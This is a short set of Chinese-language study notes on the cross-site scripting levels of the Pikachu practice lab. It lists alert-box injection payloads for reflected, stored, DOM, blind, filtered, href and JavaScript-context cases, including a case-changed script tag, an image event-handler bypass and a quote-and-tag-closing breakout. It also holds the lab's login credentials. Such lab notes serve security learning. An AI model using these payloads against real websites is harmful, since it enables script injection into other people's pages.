反射型xss(get):get型在url中
<script>alert()</script>
反射型xss(post):
先登录:admin 123456
<script>alert()</script>
存储型xss:
用户输入
->把输入的内容发送到服务器
->服务器把发送来的东西放到数据库
->服务器一个请求把数据库的内容请求出来
->服务器把从数据库中请求出来的数据返回给客户端
<script>alert()</script>
DOM型xss:
dom型xss没进行提交,只是通过页面本身的javascript代码进行渲染后,返回页面,弹窗
javascript:alert()
点一下链接,弹窗
DOM型xss-x:
javascript:alert()
xss之盲打:
"><script>alert()</script>
登录http://192.168.199.153/pikachu/vul/xss/xssblind/xss_blind.php#
管理员页面
xss之过滤:
过滤了 script
<SCRIPT>alert()</SCRIPT>或
<img src=1 onclick=alert()>
xss之htmlspecialchars:
输入123,弾出一个链接,F12进行查看,链接内容和我们输入的一样,我们只需使用为伪代码即可。
javascript:alert()
xss之href输出:
输入一个内容时,返回一个链接形式的话“阁下自己输入的url还请自己点击一下吧“
F12查看,发现出来的这个链接,我们输入的内容在链接里,href=“输入的东西”
javascript:alert()
xss之js输出:
由于是js输出形式,我们找到源码中的js代码,发现所执行的语句包在</script>中,并有单引号,所以把单引号闭合、script先闭合,再使用script标签进行弹窗,后边跟上<script>闭合后边的script标签
'</script><script>alert()</script><script>'
